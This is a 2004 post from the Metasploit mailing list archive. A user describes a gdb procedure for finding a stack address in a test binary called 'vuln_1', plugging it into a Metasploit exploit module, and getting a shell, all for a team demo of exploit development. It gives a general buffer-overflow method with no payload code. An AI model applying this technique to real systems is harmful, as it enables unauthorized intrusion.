Metasploit mailing list archives
FW: SDK Questions
From: bazarova at anz.com (Bazarov, Alexey)
Date: Thu, 12 Aug 2004 17:04:56 +1000
Well, It is not a big deal , sure that in the real world it is never happened , but at least on my presentation for my team I will be able to demonstrate a full cycle of exploit development process with a working exploit :)) Just some plays with gdb : 1) start gdb "vuln_1" 2) disas main 3) get the address of the first line , in my case, it is 0x0804 84D0 (should be the same as I know ELF structure ?) 4) break *0x0804 84D0 5) run 6) gdb gets stopped almost immediatly 7) info reg , looking for value of EBP , it is always different - 0xBFFF E708 8) add 16 bytes to this address (it seems that 8 bytes should be Ok , but I didn't test it yet) = 0xBFFF E718 9) continue gdb 9) use this address to change corresponding value in the exploit module 10) start metasploit 11) configure exploit with payload and target 12) exploit - yes! we are in Thank you guys Alex
Current thread:
- FW: SDK Questions Bazarov, Alexey (Aug 10)
- <Possible follow-ups>
- FW: SDK Questions ninjatools at hush.com (Aug 11)
- FW: SDK Questions Bazarov, Alexey (Aug 11)
- FW: SDK Questions Steve Bonds (Aug 11)
- FW: SDK Questions Bazarov, Alexey (Aug 12)